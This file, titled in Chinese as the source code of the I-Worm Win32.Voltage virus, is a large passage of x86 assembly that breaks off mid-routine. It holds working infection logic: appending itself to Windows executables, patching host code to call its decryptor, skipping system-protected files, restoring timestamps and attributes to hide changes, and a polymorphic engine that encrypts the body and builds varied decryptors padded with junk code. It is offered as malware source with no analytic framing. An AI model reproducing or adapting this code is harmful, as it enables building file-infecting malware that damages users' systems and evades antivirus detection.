i-worm_win32.voltage病毒源代码.txt

I-Worm_Win32.Voltage病毒源代码

push eax ;\
xor edx,edx ; \
div ecx ;-->align section size
sub ecx,edx ; /
pop dword ptr [ebx + 10h] ;/
add dword ptr [ebx + 10h],ecx ;set new section size of raw data
push eax 
mov [ebp + FixRVA],0 ;add VirtualSize-PointerToRawData
mov eax,[ebx + 0ch] ;subtraction to the virus offset
sub eax,[ebx + 14h] ;when decrypting and jumping to
mov [ebp + FixRVA],eax ;virus at runtime.
pop eax
mov eax,[ebx + 14h] ;get section raw data rva
add eax,[ebp + mapbase] ;convert it to va
add eax,[ebx + 8h] ;goto end of section
sub eax,VirusSize
mov [ebp + StartOfDataToEncrypt],eax;set the virus start offset
xchg edi,eax
call [ebp + GetTickCount]
mov byte ptr [ebp + XorKey],al ;set random key
push edi ;virus in infected files
push eax ;tick count
lea esi,[ebp + _main]
mov ecx,VirusSize
rep movsb ;copy virus into host
pop eax
pop edi
mov ecx,EncryptedVirus
add edi,EncryptionStart
encrypt:xor byte ptr [edi],al
inc edi
loop encrypt
call CreateDecryptor ;create polymorphic decryptor
pop ebx ;restore pe header
mov eax,[ebx + 50h] ;get size of image
add eax,VirusSize
push eax
xor edx,edx
mov ecx,[ebx + 38h] ;get section alignment
div ecx
sub ecx,edx
pop eax
add eax,ecx ;align size of image
mov dword ptr [ebx + 50h],eax ;set new size of image
inc byte ptr [ebp + Infection_Success]
call PadFileSize
ExitCloseF:
call CloseFile
ExitInfect:
call RestoreFileAttributes
ret
ExitWithoutInfection:
call RestoreFileSize
call CloseFile
call RestoreFileAttributes
ret


Infection_Success db 0

;scan a code for mov eax,fs:[00000000] instruction and 
;patch it with call virus_decryptor and inc ebx instruction
;input:
;eax - address of code
;ecx - size of code to scan
;output:
;carry flag - success\fail.
ScanAndPatch:
__1: cmp word ptr [eax],0a164h
jne nxt_w
cmp dword ptr [eax + 2h],0
jne nxt_w
mov byte ptr [eax],0e8h ;call instruction
mov ebx,[ebp + WhereToWriteDecryptor]
push eax
sub eax,[ebp + mapbase]
sub ebx,eax
sub ebx,5h
sub ebx,[ebp + mapbase]
pop eax
mov dword ptr [eax + 1h],ebx
mov byte ptr [eax + 5h],43h ;inc ebx instruction
jmp patchok ;patch only one time.
nxt_w: inc eax
loop __1
jmp nopatch
patchok:stc
ret
nopatch:clc
ret

;input:nothing
;output:carry flag:
;1=protected
;0=not protected
CheckSFPFile:
pushad
lea eax,[ebp + SFP_Check_Error_Handler]
push eax
xor eax,eax
push dword ptr fs:[eax] ;set SEH
mov fs:[eax],esp
lea eax,[ebp + SFC_DLL]
push eax
call [ebp + LoadLibrary] ;load sfc library
cmp eax,0h ;sfc here ?
je NotProtected ;we not under xp\2000
mov [ebp + hSfc],eax ;save module handle
lea ebx,[ebp + _SfcIsFileProtected]
push ebx
push eax ;sfc module handle
call [ebp + __GetProcAddress]
cmp eax,0h ;function not founded ?
je NotProtected
mov [ebp + SfcIsFileProtected],eax ;save function address
lea esi,[ebp + Unicode_Path]
xor eax,eax
mov ecx,200h
@blankU:stosb ;blank unicode buffer
loop @blankU ;to avoid errors
push 200h
lea eax,[ebp + Unicode_Path]
push eax
push -1 ;string is null terminated
lea eax,[ebp + FileToInfect]
push eax
xor eax,eax
push eax
push eax
call [ebp + MultiByteToWideChar] ;convert path into unicode
cmp eax,0h ;fail ?
je SFP_Err ;dont infect
lea eax,[ebp + Unicode_Path]
push eax
push 0h
call [ebp + SfcIsFileProtected] ;check if file is protected
cmp eax,0h ;is file protected ?
jne SFP_Err
push dword ptr [ebp + hSfc]
call [ebp + FreeLibrary] ;free sfc library
NotProtected:
pop dword ptr fs:[0] ;remove SEH
add esp,4h
popad
stc
ret
SFP_Err: ;if file is protected we here
push dword ptr [ebp + hSfc]
call [ebp + FreeLibrary] ;free sfc library 
pop dword ptr fs:[0] ;remove SEH
add esp,4h
popad
clc
ret

SFP_Check_Error_Handler:
mov esp,[esp + 8h]
pop dword ptr fs:[0] ;remove SEH
add esp,4h
popad
clc
ret


SFC_DLL db "SFC.DLL",0
hSfc dd 0
_SfcIsFileProtected　　　db　　　"SfcIsFileProtected",0
SfcIsFileProtected dd 0

Unicode_Path db 200h dup(0) ;200=2 max_path

CP_ACP equ 0

RemoveFileAttributes:
lea eax,[ebp + FileToInfect]
push eax
call [ebp + GetFileAttributes]
mov [ebp + OldFileAttribute],eax
push FILE_ATTRIBUTE_NORMAL
lea eax,[ebp + FileToInfect]
push eax
call [ebp + SetFileAttributes]
ret

OldFileAttribute dd 0

RestoreFileAttributes:
push dword ptr [ebp + OldFileAttribute]
lea eax,[ebp + FileToInfect]
push eax
call [ebp + SetFileAttributes]
ret

PadFileSize:
call pad_size
push FILE_BEGIN
push 0h
push eax
push dword ptr [ebp + hfile]
call [ebp + SetFilePointer]
push dword ptr [ebp + hfile]
call [ebp + SetEndOfFile]
ret

RestoreFileSize:
push FILE_BEGIN
push 0h
push dword ptr [ebp + FileSize]
push dword ptr [ebp + hfile]
call [ebp + SetFilePointer]
push dword ptr [ebp + hfile]
call [ebp + SetEndOfFile]
ret

CloseFile:
push dword ptr [ebp + mapbase]
call [ebp + UnMapViewOfFile]
push dword ptr [ebp + hmap]
call [ebp + CloseHandle]
lea eax,[ebp + LastWriteTime]
push eax
lea eax,[ebp + LastAccessTime]
push eax
lea eax,[ebp + CreationTime]
push eax
push dword ptr [ebp + hfile]
call [ebp + SetFileTime]
push dword ptr [ebp + hfile]
call [ebp + CloseHandle]
ret

OpenFile:
xor eax,eax
push eax
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push eax
push eax
push GENERIC_READ or GENERIC_WRITE
lea eax,[ebp + FileToInfect]
push eax
call [ebp + CreateFile]
cmp eax,INVALID_HANDLE_VALUE
je OpenFileErr
mov dword ptr [ebp + hfile],eax
push 0h
push eax
call [ebp + GetFileSize]
cmp eax,0ffffffffh
je FileSizeErr
mov dword ptr [ebp + FileSize],eax
cmp eax,2800h
jb FileSizeErr
cmp eax,300000h
ja FileSizeErr
call pad_size
cmp edx,0h ;already infected ?
jne ___1
inc byte ptr [ebp + Infection_Success]
jmp FileSizeErr
___1: lea eax,[ebp + LastWriteTime]
push eax
lea eax,[ebp + LastAccessTime]
push eax
lea eax,[ebp + CreationTime]
push eax
push dword ptr [ebp + hfile]
call [ebp + GetFileTime]
xor eax,eax
push eax
push dword ptr [ebp + FileSize]
add dword ptr [esp],VirusSize
push eax
push PAGE_READWRITE
push eax
push dword ptr [ebp + hfile]
call [ebp + CreateFileMapping]
cmp eax,0h
je FileSizeErr
mov dword ptr [ebp + hmap],eax
push dword ptr [ebp + FileSize]
add dword ptr [esp],VirusSize
xor eax,eax
push eax
push eax
push FILE_MAP_WRITE
push dword ptr [ebp + hmap]
call [ebp + MapViewOfFile]
cmp eax,0h
je MapFileErr
mov dword ptr [ebp + mapbase],eax
stc
ret
MapFileErr:
push dword ptr [ebp + hmap]
call [ebp + CloseHandle]
FileSizeErr:
push dword ptr [ebp + hfile]
call [ebp + CloseHandle]
OpenFileErr:
clc
ret

FileSize dd 0
hfile dd 0
hmap dd 0
mapbase dd 0

CreationTime dq 0
LastAccessTime dq 0
LastWriteTime dq 0


IF DEBUG
warning db "Warning!!!:Voltage virus is going to infect this file,press yes to infect",0
ENDIF

FILE_ATTRIBUTE_NORMAL equ 00000080h
OPEN_EXISTING equ 3
GENERIC_READ equ 80000000h
GENERIC_WRITE equ 40000000h
INVALID_HANDLE_VALUE equ -1
PAGE_READWRITE equ 4h
FILE_MAP_WRITE equ 00000002h
FILE_BEGIN equ 0
MB_YESNO equ 00000004h
IDYES equ 6

;eax - file size
pad_size:
push eax
xor edx,edx
mov ecx,65h ;101d
div ecx
cmp edx,0h
je no_pad
sub ecx,edx
xchg ecx,edx
no_pad: pop eax
add eax,edx
ret

;Voltage PolyMorphic Engine:
;---------------------------
;encrypt code with 4 bytes key with diffrent way each time
;and create polymorphic decryptor,the polymorphic decryptor
;has diffrent instructions that do the same thing mixed with
;junk code.


CreateDecryptor:
call InitRandomNumber ;init random number generator
call GenRandomNumber
and eax,1f40h ;get random numebr between 0 ~ 8000
cmp eax,7d0h
ja NextM
mov byte ptr [ebp + EncryptionMethod],1h ;use not
jmp EncryptVirus
NextM: cmp eax,0fa0h
ja NextM2
mov byte ptr [ebp + EncryptionMethod],2h ;use add
jmp EncryptVirus
NextM2: cmp eax,1770h
ja NextM3
mov byte ptr [ebp + EncryptionMethod],3h ;use sub
jmp EncryptVirus
NextM3: mov byte ptr [ebp + EncryptionMethod],4h ;use xor
EncryptVirus:
call GenRandomNumber
mov dword ptr [ebp + key],eax ;get random key
xor eax,eax
mov ecx,SizeOfDataToEncrypt ;size of data in words
mov edi,[ebp + StartOfDataToEncrypt]
mov esi,edi
@enc: lodsd
cmp byte ptr [ebp + EncryptionMethod],1h ;is not ?
jne NextE
not eax
jmp _stosw
NextE: cmp byte ptr [ebp + EncryptionMethod],2h ;is add ?
jne NextE2
add eax,dword ptr [ebp + key]
jmp _stosw
NextE2: cmp byte ptr [ebp + EncryptionMethod],3h ;is sub ?
jne NextE4
sub eax,dword ptr [ebp + key]
jmp _stosw
NextE4: xor eax,dword ptr [ebp + key] ;xor
_stosw: stosd
loop @enc
mov edi,[ebp + WhereToWriteDecryptor]
call WriteInstruction1
call WriteJunkCode
call WriteInstruction2
call WriteJunkCode
call WriteInstruction3
call WriteJunkCode
call WriteInstruction4
call WriteJunkCode
mov dword ptr [ebp + PolyBuffer],edi ;saved for loop
call WriteInstruction5
call WriteJunkCode
call WriteInstruction6
call WriteJunkCode
call WriteInstruction7
call WriteJunkCode
call WriteInstruction8
call WriteJunkCode
call WriteInstruction9
call WriteJunkCode
ret

EncryptionMethod db 0 ;1=not 2=add 3=sub 4=xor
key dd 0
SizeOfDecryptor dd 0
WhereToWriteDecryptor dd 0
StartOfDataToEncrypt dd 0
ProgramImageBase dd 0
PolyBuffer dd 0
SizeOfDataToEncrypt equ (VirusSize/4);virus size in dwords
FixRVA dd 0

WriteInstruction1:
;this function write pushad instruction
mov byte ptr [edi],60h ;pushad
inc edi
ret
WriteInstruction2:
;this function set esi register to start of encrypted virus
call GenRandomNumber
mov ebx,[ebp + StartOfDataToEncrypt]
sub ebx,[ebp + mapbase]
add ebx,[ebp + ProgramImageBase]
add ebx,[ebp + FixRVA]
and eax,0ffh ;get random number between 0 ~ 255
cmp eax,33h
ja ins2_1
mov byte ptr [edi],0beh ;way 1:
mov dword ptr [edi + 1],ebx ;mov esi,StartOfDataToEncrypt
add edi,5h
jmp retins2
ins2_1: cmp eax,66h
ja ins2_2
mov byte ptr [edi],68h ;way 2:
mov dword ptr [edi + 1],ebx ;push StartOfDataToEncrypt
add edi,5h
call WriteJunkCode ;pop esi
mov byte ptr [edi],5eh
inc edi
jmp retins2
ins2_2: cmp eax,99h
ja ins2_3
mov word ptr [edi],0f633h ;way 3:
add edi,2h ;xor esi,esi
push ebx
call WriteJunkCode
pop ebx
call _ins2oresival
jmp retins2
ins2_3: cmp eax,0cch
ja ins2_4
mov word ptr [edi],0f62bh ;way 4
add edi,2h ;sub esi,esi
push ebx
call WriteJunkCode
pop ebx
call _ins2oresival 
jmp retins2
ins2_4: not ebx ;way 5
mov byte ptr [edi],0beh ;mov esi,not StartOfDataToEncrypt
mov dword ptr [edi + 1],ebx 
add edi,5h
call WriteJunkCode
mov word ptr [edi],0d6f7h ;not esi
add edi,2h
retins2:ret
_ins2oresival:
;write or esi,StartOfDataToEncrypt instruction
mov word ptr [edi],0ce81h
mov dword ptr [edi + 2],ebx
add edi,6h
ret

WriteInstruction3:
;this function set edi register to esi register
call GenRandomNumber
and eax,0c8h
cmp eax,32h
ja ins3_1
mov word ptr [edi],0fe8bh ;mov edi,esi
add edi,2h
jmp retins3
ins3_1: cmp eax,64h
ja ins3_2
mov byte ptr [edi],56h ;push esi
inc edi
call WriteJunkCode
mov byte ptr [edi],5fh ;pop edi
inc edi
jmp retins3
ins3_2: cmp eax,96h
ja ins3_3
mov word ptr [edi],0fe87h ;xchg edi esi
add edi,2h
call WriteJunkCode
mov word ptr [edi],0f78bh ;mov esi,edi
add edi,2h
jmp retins3
ins3_3: mov word ptr [edi],0f787h ;xchg edi esi
add edi,2h
call WriteJunkCode
mov word ptr [edi],0f78bh ;mov esi,edi
add edi,2h
retins3:ret

WriteInstruction4:
;this function set ecx with the size of the virus in dwords
call GenRandomNumber
mov ebx,SizeOfDataToEncrypt
and eax,0ffh
cmp eax,33h
ja ins4_1
mov byte ptr [edi],0b9h ;mov ecx,sizeofvirusindwords
mov dword ptr [edi + 1],ebx
add edi,5h
jmp retins4 
ins4_1: cmp eax,66h
ja ins4_2
mov byte ptr [edi],68h ;push sizeofvirusindwords
mov dword ptr [edi + 1],ebx
add edi,5h
call WriteJunkCode
mov byte ptr [edi],59h ;pop ecx
inc edi
jmp retins4 
ins4_2: cmp eax,99h
ja ins4_3
mov word ptr [edi],0c933h ;xor ecx,ecx
add edi,2h
push ebx
call WriteJunkCode
pop ebx
call _ins4orecxval
jmp retins4 
ins4_3: cmp eax,0cch
ja ins4_4
mov word ptr [edi],0c92bh ;sub ecx,ecx
add edi,2h
push ebx
call WriteJunkCode
pop ebx
call _ins4orecxval
jmp retins4
ins4_4: not ebx
mov byte ptr [edi],0b9h ;mov ecx,not sizeofvirusindwords
mov dword ptr [edi + 1],ebx
add edi,5h
call WriteJunkCode
mov word ptr [edi],0d1f7h
add edi,2h
retins4:ret
_ins4orecxval:
mov word ptr [edi],0c981h
mov dword ptr [edi + 2],ebx
add edi,6h
ret
WriteInstruction5:
;this function read 4 bytes from [esi] into eax
;and add to esi registe